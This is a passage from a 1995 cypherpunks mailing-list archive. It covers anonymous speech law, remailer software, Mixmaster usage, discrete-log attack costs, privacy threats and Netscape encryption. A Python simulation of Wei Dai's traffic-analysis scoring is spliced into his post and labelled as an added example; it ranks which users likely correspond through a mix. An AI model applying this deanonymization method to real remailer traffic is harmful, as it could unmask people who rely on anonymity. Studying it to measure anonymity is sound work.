To me, Los Angeles' ordinance cannot be read as being void on its face. Certainly a fair reading of it does not permit a conclusion that it prohibits the distribution of handbills "of any kind at any time, at any place, and in any manner," Lovell v. Griffin, 303 U.S. 444, 451 (1938), as the Court seems to conclude. In Griffin, the ordinance completely prohibited the unlicensed distribution of any handbills. As I read it, the ordinance here merely prohibits the distribution of a handbill which does not carry the identification of the name of the person who "printed, wrote, compiled . . . manufactured [or] . . . caused" the distribution of it. There could well be a compelling reason for such a requirement. The Court implies as much when it observes that Los Angeles has not "referred to any legislative history indicating" that the ordinance was adopted for the purpose of preventing "fraud, false advertising and libel." But even as to its legislative background there is pertinent material which the Court overlooks. At oral argument, the City's chief law enforcement officer stated that the ordinance was originally suggested in 1931 by the Los Angeles Chamber of Commerce in a complaint to the City Council urging it to "do something about these handbills and advertising matters which were false and misleading." Upon inquiry by the Council, he said, the matter was referred to his office, and the Council was advised that such an ordinance as the present one would be valid.
He further stated that this ordinance, relating to the original inquiry of the Chamber of Commerce, was thereafter drafted and submitted to the Council. It was adopted in 1932. In the face of this and the presumption of validity that the ordinance enjoys, the Court nevertheless strikes it down, stating that it "falls precisely under the ban of our prior cases." This cannot follow, for in each of the three cases cited, the ordinances either "forbade any distribution of literature . . . without a license," Lovell v. Griffin, supra, or forbade, without exception, any distribution of handbills on the streets, Jamison v. Texas, 318 U.S. 413 (1943); or, as in Schneider v. State, 308 U.S. 147 (1939), which covered different ordinances in four cities, they were either outright bans or prior restraints upon the distribution of handbills. I, therefore, cannot see how the Court can conclude that the Los Angeles ordinance here "falls precisely" under any of these cases. On the contrary, to my mind, they neither control this case nor are apposite to it. In fact, in Schneider, depended upon by the Court, it was held, through Mr. Justice Roberts, that, "In every case . . . where legislative abridgment of the rights is asserted, the courts should be astute to examine the effect of the challenged legislation . . . weigh the circumstances and . . . appraise the substantiality of the reasons advanced . . . ." Id., at 161. The Court here, however, makes no appraisal of the circumstances, or the substantiality of the claims of the litigants, but strikes down the ordinance as being "void on its face." I cannot be a party to using such a device as an escape from the requirements of our cases, the latest of which was handed down only last month. Bates v. Little Rock, 361 U.S. 516. n1 Therefore, before passing upon the validity of the ordinance, I would weigh the interests of the public in its enforcement against the claimed right of Talley. 
The record is barren of any claim, much less proof, that he will suffer any injury whatever by identifying the handbill with his name. Unlike N. A. A. C. P. v. Alabama, 357 U.S. 449 (1958), which is relied upon, there is neither allegation nor proof that Talley or any group sponsoring him would suffer "economic reprisal, loss of employment, threat of physical coercion [or] other manifestations of public hostility." Id., at 462. Talley makes no showing whatever to support his contention that a restraint upon his freedom of speech will result from the enforcement of the ordinance. The existence of such a restraint is necessary before we can strike the ordinance down. But even if the State had this burden, which it does not, the substantiality of Los Angeles' interest in the enforcement of the ordinance sustains its validity. Its chief law enforcement officer says that the enforcement of the ordinance prevents "fraud, deceit, false advertising, negligent use of words, obscenity, and libel," and, as we have said, that such was its purpose. In the absence of any showing to the contrary by Talley, this appears to me entirely sufficient. I stand second to none in supporting Talley's right of free speech -- but not his freedom of anonymity. The Constitution says nothing about freedom of anonymous speech. In fact, this Court has approved laws requiring no less than Los Angeles' ordinance. I submit that they control this case and require its approval under the attack made here. First, Lewis Publishing Co. v. Morgan, 229 U.S. 288 (1913), upheld an Act of Congress requiring any newspaper using the second-class mails to publish the names of its editor, publisher, owner, and stockholders. 39 U. S. C. @ 233. Second, in the Federal Regulation of Lobbying Act, 2 U. S. C. @ 267, Congress requires those engaged in lobbying to divulge their identities and give "a modicum of information" to Congress. United States v. Harriss, 347 U.S. 612, 625 (1954). 
Third, the several States have corrupt practices acts outlawing, inter alia, the distribution of anonymous publications with reference to political candidates. n2 While these statutes are leveled at political campaign and election practices, the underlying ground sustaining their validity applies with equal force here. No civil right has a greater claim to constitutional protection or calls for more rigorous safeguarding than voting rights. In this area the danger of coercion and reprisals -- economic and otherwise -- is a matter of common knowledge. Yet these statutes, disallowing anonymity in promoting one's views in election campaigns, have expressed the overwhelming public policy of the Nation. Nevertheless the Court is silent about this impressive authority relevant to the disposition of this case. All three of the types of statutes mentioned are designed to prevent the same abuses -- libel, slander, false accusations, etc. The fact that some of these statutes are aimed at elections, lobbying, and the mails makes their restraint no more palatable, nor the abuses they prevent less deleterious to the public interest, than the present ordinance. All that Los Angeles requires is that one who exercises his right of free speech through writing or distributing handbills identify himself just as does one who speaks from the platform. The ordinance makes for the responsibility in writing that is present in public utterance. When and if the application of such an ordinance in a given case encroaches on First Amendment freedoms, then will be soon enough to strike that application down. But no such restraint has been shown here. After all, the public has some rights against which the enforcement of freedom of speech would be "harsh and arbitrary in itself." Kovacs v. Cooper, 336 U.S. 77, 88 (1949). We have upheld complete proscription of uninvited door-to-door canvassing as an invasion of privacy. Breard v. Alexandria, 341 U.S. 622 (1951). 
Is this less restrictive than complete freedom of distribution -- regardless of content -- of a signed handbill? And commercial handbills may be declared verboten, Valentine v. Chrestensen, 316 U.S. 52 (1942), regardless of content or identification. Is Talley's anonymous handbill, designed to destroy the business of a commercial establishment, passed out at its very front door, and attacking its then lawful commercial practices, more comportable with First Amendment freedoms? I think not. Before we may expect international responsibility among nations, might not it be well to require individual responsibility at home? Los Angeles' ordinance does no more. Contrary to petitioner's contention, the ordinance as applied does not arbitrarily deprive him of equal protection of the law. He complains that handbills are singled out, while other printed media -- books, magazines, and newspapers -- remain unrestrained. However, "the problem of legislative classification is a perennial one, admitting of no doctrinaire definition. Evils in the same field may be of different dimensions and proportions, requiring different remedies. . . . Or the reform may take one step at a time, addressing itself to the phase of the problem which seems most acute to the legislative mind. . . . The prohibition of the Equal Protection Clause goes no further than the invidious discrimination. [I] cannot say that that point has been reached here." Williamson v. Lee Optical Co., 348 U.S. 483, 489 (1955). I dissent. Footnotes n1 "When it is shown that state action threatens significantly to impinge upon constitutionally protected freedom it becomes the duty of this Court to determine whether the action bears a reasonable relationship to the achievement of the governmental purpose asserted as its justification." 361 U.S., at 525. n2 Thirty-six States have statutes prohibiting the anonymous distribution of materials relating to elections. E. g.: Kan. Gen. Stat., 1949, @ 25-1714; Minn. Stat. Ann. 
@ 211.08; Page's Ohio Rev. Code Ann. @ 3599.09; Purdon's Pa. Stat. Ann., Title 25, @ 3546.

********************************************
David Banisar (Banisar at epic.org)       * 202-544-9240 (tel)
Electronic Privacy Information Center   * 202-547-5482 (fax)
666 Pennsylvania Ave, SE, Suite 301     * ftp/gopher/wais cpsr.org
Washington, DC 20003                    * HTTP://epic.digicash.com/epic
**********************************************

From root at einstein.ssz.com Thu Jan 19 20:39:08 1995
From: root at einstein.ssz.com (root)
Date: Thu, 19 Jan 95 20:39:08 PST
Subject: stjude?
In-Reply-To: <199501200427.UAA16720@well.sf.ca.us>
Message-ID: <199501200441.WAA03899@einstein.ssz.com>

>
>
> i'm not on the list because i'm writing 2 books, but i have root in the
> solar system, true, and i did come up with the name cypherpunk one morning
> as i was washing my cat... hit me like a meteorite... cypherpunk... yes...
>

Now wait just one second here....I have root at Solar Soyuz Zaibatsu and that is about as close to the solar system as you can get.....you stole the passwords......somebody call the net cops !!!!!

From blancw at pylon.com Thu Jan 19 20:46:04 1995
From: blancw at pylon.com (blancw at pylon.com)
Date: Thu, 19 Jan 95 20:46:04 PST
Subject: T.A.Z. on Disk
Message-ID: <199501200446.UAA04577@deepthought.pylon.com>

I just sent this email to Sandy Sandfort, and he suggested I share it with the list:

-------------------

I was just at BlockBuster Music store this evening and happened to go by the 'H's in the Rock Music section - and saw Hakim Bey's name. Yes, there is a CD named T.A.Z *. Blockbuster allows customers to listen to CDs before they buy, so I listened to it.
Hakim actually reads several chapters from his book, and there is odd music at the introduction and in the background while he reads. He has a very nice, deep, clear voice. I guess you could say this is one of those self-help books-on-tape - sort of a "save time & become an anarchist while you drive" CD. *T.A.Z. = The Autonomous Zone .. Blanc From bal at martigny.ai.mit.edu Thu Jan 19 21:16:42 1995 From: bal at martigny.ai.mit.edu (Brian A. LaMacchia) Date: Thu, 19 Jan 95 21:16:42 PST Subject: Factorisation and Discrete Logs In-Reply-To: <199501190440.UAA28769@netcom5.netcom.com> Message-ID: <9501200516.AA28512@toad.com> From: mpd at netcom.com (Mike Duvos) Date: Wed, 18 Jan 1995 20:40:46 -0800 (PST) X-Mailer: ELM [version 2.4 PL23] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 1017 Sender: owner-cypherpunks at toad.com Precedence: bulk Derek Atkins writes: > You are right... Given talks Ive had with Brian LaMacchia, > who broke a version of "Secure SunRPC" (a 192-bit prime), he > claims that the difficulty is reducing a D-L problem is > about the same amount of computation to factorize an RSA > modulus of approximately the same size.. Just to clarify, the estimate I give people is that computing discrete logs in a prime field GF(p) is about as hard as factoring a number 10 digits (33 bits) longer than p. This estimate is based on the empirical data Andrew Odlyzko and I collected for 192-bit and 224-bit moduli. To the best of my knowledge no one has attempted a discrete log modulus larger than 224 bits. (There just haven't been any juicy targets recently to attack...) Although DH and RSA are believed to be of approximately equal difficulty given the same number of bits, DH is additionally vulnerable because system designers usually publish an "official" modulus and primitive root for everyone to use, whereas in RSA, everyone has their own key. 
This is not a property of D-H key exchange, per se, but of the actual uses to which people have put the D-H protocol. Two parties wishing to generate a shared secret could certainly produce a D-H modulus and generator on the fly for one-time use, but that takes some time. The fact that the discrete log problem is brittle simply means that you have to choose your modulus taking a few more things into account when using the D-H protocol for a particular application. To mount an attack on PGP, for instance, you must factor a key for each person whose privacy you wish to compromise. Breaking Sun's published 192 bit DH modulus instantly broke SunRPC on all machines using the protocol. The latter was a lot less work than the former. Breaking SunRPC was a lot less work than breaking a (typical) PGP key simply because the SunRPC modulus was so small. If I'm given a choice of factoring 100 different 512-bit PGP keys (for 100 different users) or breaking a 768-bit D-H modulus that compromises all 100 users simultaneously, I'll take the factoring problems. --bal From blancw at pylon.com Thu Jan 19 22:05:30 1995 From: blancw at pylon.com (blancw at pylon.com) Date: Thu, 19 Jan 95 22:05:30 PST Subject: Ask Bill Message-ID: <199501200606.WAA05378@deepthought.pylon.com> Bill Gates now has an address for questions - askbill at microsoft.com He has a column which is published every other Wednesday In the local Seattle Post-Intelligencer, where he answers a few of the questions which he finds in that mailbox address. He says he will not reply to questions personally (only in the column), but you never know - a few of you special people could burn his ear and perhaps elicit one to yourself (or perhaps even to the list!) .. Blanc From lmccarth at ducie.cs.umass.edu Thu Jan 19 22:21:55 1995 From: lmccarth at ducie.cs.umass.edu (L. 
McCarthy)
Date: Thu, 19 Jan 95 22:21:55 PST
Subject: Julf operates anon.penet.fi
In-Reply-To:
Message-ID: <199501200623.BAA25299@ducie.cs.umass.edu>

Nathan writes:
> sez it all

likewise

From weidai at eskimo.com Thu Jan 19 22:43:25 1995
From: weidai at eskimo.com (Wei Dai)
Date: Thu, 19 Jan 95 22:43:25 PST
Subject: The Remailer Crisis
In-Reply-To: <199501200105.RAA05837@infinity.c2.org>
Message-ID:

On Thu, 19 Jan 1995, sameer wrote:

> To my knowledge there exist 3 packages which allow you to run
> a remailer out of an account. Matt Ghio's remailer, mixmaster (Lance
> Cottrell?), and the simple package available on ftp.csua.berkeley.edu,
> which derives from Eric and Hal's original code.

Can anyone give an overview of the remailer packages that are currently available? What features and differences do they have, and where to get them?

From weidai at eskimo.com Thu Jan 19 22:52:53 1995
From: weidai at eskimo.com (Wei Dai)
Date: Thu, 19 Jan 95 22:52:53 PST
Subject: traffic analyzing Chaum's digital mix
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

I have been thinking about the problem of traffic analysis of a remailer. More specifically, the problem is how can Eve trace Bob, who is communicating with Alice through an ideal Chaumian digital mix? (As most of you know, current remailers are missing many of the features of the digital mix Chaum specified in his CACM paper (at ftp://ftp.csua.berkeley.edu/pub/cypherpunks/papers/chaum.digital-mix.gz ), thus making them extremely vulnerable to anyone with non-trivial resources.)

The simplifying assumptions I use here are:

1. there is one mix, which is perfectly secure and trustworthy (note that multiple mixes do not increase untraceability over a single mix if it is perfectly secure and trustworthy)
2. anyone can monitor all traffic in and out of the mix, but no one can link an incoming message with an outgoing one

The basic approach is to use this raw traffic information to calculate a SCORE for each user of the remailer with respect to Alice, where the user with the highest SCORE is the person Alice is most probably communicating with.

The idea is that with a Chaumian mix, every time Alice sends a message to Bob there is always a pattern of Alice sending a message to the mix, followed by Bob receiving a message from the mix during the next batch. By counting the number of such correlations for each user over a period of time, and taking into account the fact that users who receive more messages from the mix will have higher numbers of coincidental correlations, a SCORE can be calculated so that it would be a good indication over the long run of the probability that a particular user is communicating with Alice.

For a digital mix that does batching based on a fixed number of incoming messages, the SCORE for a user U can be calculated in the following way:

1. for each mix batch i, calculate P(i)=lesser(# of messages sent by Alice, # of messages subsequently received by user U)
2. after a period of time t, calculate Q=sum(P(i))
3. calculate the average value of Q of users with similar usage patterns as user U
4. SCORE(U) = Q / average(Q)

Now whether or not this approach actually works depends on whether the number of users with SCORE higher than Bob's SCORE converges to 0 as time t increases, and how quickly it converges. Answering these two questions will require modeling the usage patterns of Alice, Bob, and the mix as a whole. I'll try to do this for some simple cases in a later post.
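The four scoring steps above, run over constructed traffic, as an added example that is not part of Wei Dai's post. It is useful for judging how quickly a batching mix's protection erodes for a regular correspondent pair. The traffic model, every name and parameter, and the reading of "users with similar usage patterns" as the two users with the closest received volume are assumptions of this sketch.

```python
import random
from collections import Counter


def simulate_mix(n_batches, batch_size=10, p_alice=0.3, seed=1995):
    """Constructed traffic for one fixed-size batching mix.

    Returns only what the observer in the post can see: for each batch,
    a Counter of senders and a Counter of recipients, with no linkage
    between the two. Alice writes to Bob in a fraction of the batches;
    the rest is cover traffic, with three heavy receivers (u0..u2).
    """
    rng = random.Random(seed)
    heavy = [f"u{i}" for i in range(3)]
    light = [f"u{i}" for i in range(3, 20)]
    recipients = heavy + light + ["bob"]          # Bob also gets cover mail
    weights = [5] * len(heavy) + [1] * len(light) + [1]
    senders = heavy + light
    view = []
    for _ in range(n_batches):
        sent, received = Counter(), Counter()
        slots = batch_size
        if rng.random() < p_alice:                # the real Alice -> Bob message
            sent["alice"] += 1
            received["bob"] += 1
            slots -= 1
        for _ in range(slots):                    # cover traffic fills the batch
            sent[rng.choice(senders)] += 1
            received[rng.choices(recipients, weights)[0]] += 1
        view.append((sent, received))
    return view


def raw_q(view, source):
    """Steps 1-2: Q(U) = sum over batches of min(#sent by source, #received by U)."""
    q, volume = Counter(), Counter()
    for sent, received in view:
        for user, n in received.items():
            volume[user] += n
            q[user] += min(sent[source], n)
    return q, volume


def scores(view, source="alice", peers=2):
    """Steps 3-4: SCORE(U) = Q(U) / average Q of users with similar usage."""
    q, volume = raw_q(view, source)
    result = {}
    for user in volume:
        # Assumption: "similar usage" = the `peers` other users whose total
        # received volume is closest to this user's (ties broken by name).
        others = sorted((u for u in volume if u != user),
                        key=lambda u: (abs(volume[u] - volume[user]), u))[:peers]
        baseline = sum(q[u] for u in others) / len(others) if others else 0
        # With no baseline yet (very short observation), fall back to raw Q.
        result[user] = q[user] / baseline if baseline else float(q[user])
    return result


def ranking(view, source="alice"):
    """Users ordered by SCORE, highest first."""
    return sorted(scores(view, source).items(), key=lambda kv: -kv[1])


def users_scoring_above(view, target="bob", source="alice"):
    """The post's convergence measure: how many users score at least as high as Bob."""
    s = scores(view, source)
    mark = s.get(target, 0.0)
    return sum(1 for user, value in s.items() if user != target and value >= mark)


if __name__ == "__main__":
    observed = simulate_mix(500)
    for t in (10, 50, 200, 500):
        print(f"after {t:3d} batches: {users_scoring_above(observed[:t])} "
              f"users score >= Bob")
    q, _ = raw_q(observed, "alice")
    print("raw Q, top 4:", q.most_common(4))
    print("SCORE, top 4:", ranking(observed)[:4])
```

The raw Q column shows why step 3 matters: heavy receivers pile up coincidental matches with Alice's batches, and only the comparison against peers of similar volume separates them from Bob.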
Wei Dai

From s675570 at aix1.uottawa.ca Thu Jan 19 23:15:34 1995
From: s675570 at aix1.uottawa.ca (Angus Patterson)
Date: Thu, 19 Jan 95 23:15:34 PST
Subject: T.A.Z. on Disk
In-Reply-To: <199501200446.UAA04577@deepthought.pylon.com>
Message-ID:

The book "Temporary Autonomous Zone" is available online at wiretap.spies.com

The most recent issue of Mondo 2000 talks about the CD with Hakim Bey and the producer. I also saw another e-book site that had some more of his stuff, can't remember what it was though. Of course, one could always just buy them on paper (remember that?)

From erc at s116.slcslip.indirect.com Thu Jan 19 23:41:18 1995
From: erc at s116.slcslip.indirect.com (Ed Carp [khijol Sysadmin])
Date: Thu, 19 Jan 95 23:41:18 PST
Subject: Remailer-on-a-CD
In-Reply-To: <9501191924.AA17670@toad.com>
Message-ID:

> >The "Linux mavens" followed by the "black box" stuff sparked an idea...
>
> >package. To make it as easy as possible, I'd use the UMSDOS filesystem so
> >that Linux could be installed on a DOS machine without any reformatting
> >repartitioning, or similar headaches.
>
> >distribution already has) and some boot options, you'd have an "instant
> >remailer" software package, able to transform any 386SX/4MB RAM DOS machine
> >or better into a Linux-based remailer site, complete with aliases, logging

If you look out on ftp.netcom.com:/pub/ec/ecarp/linux*, you'll find a bare-bones Linux set that will install right in a DOS filesystem (it's a .ZIP file). It's intended for SLIP clients, but it could easily be adapted for setting up an "instant remailer".
--
Ed Carp, N7EKG    Ed.Carp at linux.org, ecarp at netcom.com
801/534-8857 voicemail    801/460-1883 digital pager
Finger ecarp at netcom.com for PGP 2.5 public key    an88744 at anon.penet.fi
** PGP encrypted email preferred! **

Cop: "How many beers have you had tonight, bro?"
Suspect: "Seventy." -- from the TV show "Cops"

From mab at research.att.com Fri Jan 20 00:34:57 1995
From: mab at research.att.com (Matt Blaze)
Date: Fri, 20 Jan 95 00:34:57 PST
Subject: Threats in real life - what are we worried about?
Message-ID: <9501200836.AA19977@merckx.info.att.com>

I wrote:
>
> Given existing crypto tools (PGP, etc), what are the top ten
> practical attacks against the privacy of stored data and
> electronic mail? Who are the bad guys? What tools do we need
> to limit these threats?
>
>I'll post my own thoughts later.
>

Matt's Top Ten Underappreciated Threats to Privacy on the Internet
==================================================================

1. The sorry state of software. Everyone knows that nobody knows how to write software. Modern systems give hundreds of thousands of lines of code the chance to violate security policy. How can we be sure that the software we trust does the right thing? How can we reduce the opportunities for problems?

2. Ineffective protection against denial of service attacks. While not a direct threat to privacy, the ease with which almost anyone can mount effective denial of service attacks threatens the ability to deploy anonymous services. You'll note that no one worries very much about the millions of anonymous entry points to more robust networks like the telephone system or the postal service, where it's relatively hard (and expensive) for an individual to cause large-scale service disruption. How can we make the 'net robust enough to withstand mailbombs and newsgroup spamming?

3. Poor secret storage on networked computers. Cryptosystems allow you to manage large secrets by protecting smaller ones (keys).
Unfortunately, modern computers are awful at protecting even the smallest secrets. Multi-user networked workstations can be broken into and their memories compromised. Standalone, single-user machines can be stolen or compromised through viruses that leak secrets asynchronously. What are the right mechanisms for storing and managing keys on various platforms? Remote servers, where there may be no user available to enter a passphrase (but see threat #5, below), are an especially hard problem.

4. Poorly understood random number generation techniques. Keys and session variables need good sources of unpredictable bits. Currently used techniques (like event inter-arrival times) are only marginally well understood and depend a great deal on low-level characteristics of the platforms on which they are run. We need a wider range of techniques (especially ones that work without relying on user input), and to better understand their risks and failure modes. Some interesting ideas have been proposed that deserve further study. At CRYPTO '94 there was an interesting paper on using disk airflow variation to get random bits. Another interesting technique, first proposed by Don Mitchell, involves exploiting clock skew. Here's a C program that seems to produce one pretty random bit per second on most platforms. How good are the bits? Can we get more bandwidth out of it?

#include <signal.h>   /* signal(), SIGALRM */
#include <stdio.h>    /* printf(), fflush() */
#include <unistd.h>   /* alarm() */

/* Free-running counter; volatile so the busy loop is not optimized away. */
volatile unsigned int count=0;

/* Once a second: re-arm the timer and print the counter's low bit. */
void printbit(int sig)
{
    (void)sig;
    signal(SIGALRM,printbit);
    alarm(1);
    printf("%1d",(int)(count&01));
    fflush(stdout);
}

int main(void)
{
    signal(SIGALRM,printbit);
    alarm(1);
    while (1)
        count++;
}

5. Weak passphrases. Most crypto software addresses the key storage and key generation problems by relying on user-generated passphrase strings, which are presumed to contain enough entropy to produce good key material and are also easy enough to remember that they do not require secure storage.
While dictionary attacks are a well known problem with short passwords, much less is known about lines of attack against user-selected passphrase-based keys. Shannon tells us that English text has just over 1 bit of entropy per character, which would seem to leave most passphrases well within reach of brute-force search. Less is known, however, about good techniques for enumerating passphrases in order to exploit low entropy. Until we have a better understanding of how to attack passphrases, we really have no idea how weak or strong they are.

6. Limited support for remote trusted agents. Almost all currently available cryptographic software assumes that the user is in direct control over the systems on which they run and has a secure path to it. For example, the interfaces to programs like PGP and CFS assume that their input comes from the user over a secure path like the local console. This is not always the case, of course; consider the problem of reading your mail remotely when logged in over the Internet. We need better mechanisms for transferring the trusted operations to the local trusted machine while keeping the logical operations (like where the mail is) where they logically belong.

7. Poorly understood protocol and service interactions. Features frequently come back to bite us, and it's hard to know even where to look. The Internet worm was propagated via an obscure and innocent-looking feature in sendmail; how many more features in how many more programs have unexpected consequences just waiting to be discovered? Is the conventional wisdom of hiding behind firewalls and turning off services really the only answer?

8. Lack of scalable security infrastructure. No comment...

9. Poorly understood "out of band" attack risks. Security people tend to focus on what's easy to model. Unfortunately, attackers focus on what's easy to exploit. We need a better understanding of just how easy some non-traditional attacks are.
Most of the answers are probably too scary to think about. How long do our keys need to be in the face of electromagnetic radiation, physical monitoring, Trojan horses, social engineering, and so on and so on?

10. No broad-based demand for security. This is a well-known problem among almost everyone who has tied his or her fortune to selling security products and services. Until there is widespread demand for transparent security, the tools and infrastructure needed to support it will be expensive and inaccessible to many applications. This is partly a problem of understanding the threats and risks in real applications, and of building systems that include security as a basic feature rather than as a later "add on".

There's a lot missing from this list, and a lot you can disagree with among the things that are on it. Flame away...

-matt

From david.lloyd-jones at canrem.com Fri Jan 20 00:36:44 1995
From: david.lloyd-jones at canrem.com (David Lloyd-Jones)
Date: Fri, 20 Jan 95 00:36:44 PST
Subject: ELECTRONIC CASH ILLEG
Message-ID: <60.19099.6525.0C1CA93D@canrem.com>

Thomas Grant Edwards writes:

TS+Actually, the "backing" of a fiat currency is the need to have some
  +around to pay your taxes, else you go to jail. You are taxed on many
  +types of income, even if they are not directly exchanged in the fiat
  +currency. Somehow you have to get some.

This is pretty much true, but does not logically justify your conclusion:

TS+This also means that higher taxes can make the currency more desirable,
  +lower taxes less, higher government spending less, lower government
  +spending more, etc.

This is only somewhat true. The most important factor is that currencies are traded on a fairly free market. This means supply and demand, not any firm intrinsic qualities of anything, dominate.
If a country is running a positive net balance, whether by trade, capital investment, or influx of rich refugees, there will be a demand for its funnypaper, and that paper's price, in other currencies will rise. The same will apply to currencies not attached to countries -- such as the NetCredit, which I am working to put into reticulation. That's electronic for "circulation". :-) The hardest currencies, roughly in order, are those of Switzerland, Taiwan, and Japan. Germany is no longer on the list because Kohl bought the second last election in the most expensive bit of bribery in the history of democratic politics: the couple of trillion dollars he spent by assigning par value to the OstMark. Hong Kong is not on the list because of the huge outflows for the development of China, which tends to balance supply and demand at a lower/softer level than it would otherwise have. The US is no longer on the list because Reagan booted the whole thing into the can. Best, -dlj. -dlj. david.lloyd-jones at canrem.com * 1st 1.11 #3818 * Who won't do the arithmetic will live by stupid policies. From lmccarth at ducie.cs.umass.edu Fri Jan 20 00:53:20 1995 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Fri, 20 Jan 95 00:53:20 PST Subject: Remailer Software Sites/Comparison Message-ID: <199501200858.DAA05727@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- Wei Dai writes: > Can anyone give an overview of the remailer packages that are currently > available? What features and differences do they have, and where to get > them? Raph Levien's Remailers WWW page has links to most of the material on the remailer software of which I'm aware: http://http.cs.berkeley.edu/~raph/remailer-list.html The remailer-help file from mixmaster at nately.ucsd.edu gives an ftp directory from which one may ultimately obtain Lance Cottrell's Mixmaster code, after following an export control process which I assume resembles MIT's method of distributing PGP. 
Lance sent out a first draft of instructions on the mixing (including packet splitting & recombination) features of Mixmaster to the list a few months ago, which I enclose below. Mixmaster is the latest and most sophisticated of the remailer packages I've seen, so I'd recommend it to anyone looking to install a new remailer in North America. - -L. Futplex McCarthy ===== forwarded message follows =============== Date: Sun, 20 Nov 1994 17:07:02 -0800 To: cypherpunks at toad.com, remailer-operators at c2.org Subject: 1st Draft Mixmaster chaining instructions Sender: owner-cypherpunks at toad.com Precedence: bulk X-Status: [...] Here is the first draft of the instructions for using Mixmaster to build remailer messages. I am posting it to give a flavor of what the program does, and to request comments, both on the features and on the clarity of the help file itself. Instructions for using Mixmaster to create type 2 remailer messages. I assume that you have either compiled Mixmaster, or that you have acquired a precompiled copy. While you do not need PGP to use Mixmaster, it is useful for key management, and is required if you desire security of the content of the message you are sending (which will be visible to the last remailer). Theory and purpose of remailers: The purpose of anonymous remailers (hereafter simply remailers), is to provide protection against traffic analysis. Traffic analysis is the study of who you are communicating with, when, and how often. This reveals more than you might expect about your activities. It will indicate who your friends and colleagues are (and they can be told apart by looking at the times you contact them). What your interests are, from which catalog companies you contact, and which ftp and WWW sites you visit. Traffic analysis can even reveal business secrets, e.g. your frequent contact with a rival could give hints of an impending merger. Remailers protect your email from traffic analysis. 
The original remailers did this by removing all headers, except the subject line, from any message you sent to them and then forwarding them a destination of your choice. The recipient of such a message would not know who had sent it. The addition of encryption to this scheme gave significant protection from attackers who simply look at passing messages for to and from fields. Passing a message through several remailers in a row is much better, but still vulnerable to an attacker who can watch messages go into and out of each remailer. Two more elements are required: messages must be reordered within the remailer before being forwarded (this is being done by a few of the old style remailers), and all messages must be indistinguishable. This last is the primary improvement with the type 2 remailer, Mixmaster. Using type 2 remailers: The trend towards ever more complicated remailer message formats has been clear for some time. Several programs have been written to automatically build messages which will be remailed by several remailers. This process is called chaining. With type 2 remailers it is no longer possible to create these messages by hand. Mixmaster takes a message you wish to send, a list of remailers to chain it through, and a final destination, and builds the packet which the remailers will use. For simplicity I will first describe the interactive use of Mixmaster, then I will discuss how it can be controlled through command line arguments. Interactive use of Mixmaster: If you run Mixmaster with no arguments, you will be prompted for all the required information. First you will be asked to specify the final destination of the message. This is the full email address where you want your message delivered. Remember that the message is being sent by the last remailer in the chain, so you must specify the full internet address (e.g. name at machine.place.com), you may not use local mail aliases. You may enter multiple recipients on separate lines. 
Hit return on a blank line to stop entering destinations. You must have at least one.

Next you will be asked to enter any headers you want to have inserted before the message. These are those lines at the beginning of email messages, like From: fred at bedrock.univ.edu, or Subject: Party invitation. If you want your message to have a subject when it is delivered, you must enter a line Subject: your subject here. Note that Subject must be capitalized, with the : and space as shown. A subject header can be added by using the -s command line argument. When you are done entering headers, hit return (it is OK to have zero headers).

You will now be presented with a list of remailers through which you can chain your messages. The order in which you choose them is the order in which they will be traversed by your message. You may choose up to 20 of them, but remember that the reliability and speed of the chain diminish as the number of remailers in the chain increases. Four is a reasonable number of remailers to use. It is fine to use a given remailer more than once in your chain. Press return on a blank line to stop entering remailers.

Finally you will be asked what file you want to send. This must be an ASCII file. You may either enter the name of an existing file, or you may choose to enter the message directly by typing "stdin" as the file name. This is intended for use by scripts. There are no editing capabilities when using stdin. Enter the end of file character (EOF is ^D) when you are done entering the file.

Mixmaster will now build the type 2 remailer packet, and send it to the first remailer in the chain.

Command line arguments to Mixmaster:

Mixmaster [-c] [in.filename] [-f] [-s "subject"] [-o "outfile"] [-to a at b.com] [-l 3 2 6 ...]

-c
    this indicates that chaining rather than remailer functions are desired. It is a NOP since chaining is the default operation.

"filename"
    if a filename is given, then this will be used as the input file. As in the interactive mode, you may choose "stdin". No filename will be prompted for.

-f
    filter mode. All prompts suppressed, but input still accepted as described in the interactive section. The remailer list must be specified on the command line.

-s "subject"
    Adds a subject line to the message. The user should NOT include Subject: in this string. Mixmaster will not prompt for other headers if -s is used.

-o "outfile"
    Specify an output file rather than sending the message to the first remailer automatically. If outfile is "stdout", then the remailer packet will be printed to stdout.

-to foo at bar.org
    specifies the final destination of the message. Only one destination can be specified. Mixmaster will not prompt for other destinations if -to is used.

-l 4 3 5 ...
    Specifies the list of remailers to chain through. This must be the last argument on the command line. A maximum of 20 remailers may be specified. Mixmaster will not prompt for other remailers if -l is used.

- --------------------------------------------------
Lance Cottrell who does not speak for CASS/UCSD
loki at nately.ucsd.edu
PGP 2.6 key available by finger or server.
Encrypted mail welcome.
Home page http://nately.ucsd.edu/~loki/
Home of "chain" the remailer chaining script.
[...]

- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

From aba at dcs.exeter.ac.uk Fri Jan 20 03:34:50 1995
From: aba at dcs.exeter.ac.uk (aba at dcs.exeter.ac.uk)
Date: Fri, 20 Jan 95 03:34:50 PST
Subject: Netscape, RC4, key exchange?
Message-ID: <19875.9501201052@exe.dcs.exeter.ac.uk>

-----BEGIN PGP SIGNED MESSAGE-----

grendel at netaxs.com wrote:
> aba at atlas.ex.ac.uk wrote:
> > I have code to generate the RSA key pairs and modulus, what I am
> > looking for is code to factorise a number using one of the better
> > algorithms (quadratic sieve, etc.).
>
> It's been established that the encryption in Netscape is 40 bit
>RC4, not 40 bit RSA, [...]

Ok, so Netscape (the exported version only?) uses 40bit RC4 for encryption, but what about key exchange? RC4 is a stream cypher so both the receiver and sender need to know the key.

Does anybody know what method Netscape uses to exchange keys DH, RSA, other? and what key sizes?

Adam

From caj at tower.stc.housing.washington.edu Fri Jan 20 04:09:42 1995
From: caj at tower.stc.housing.washington.edu (Craig A. Johnston)
Date: Fri, 20 Jan 95 04:09:42 PST
Subject: remailer questions
Message-ID: <199501201209.EAA01188@tower.stc.housing.washington.edu>

Ok, I'm planning on putting up a remailer on my Linux box. One of the things I'd really like to know is, how much in the way of attempts to break into your machines are remailer ops seeing? How much in the way of other attacks?

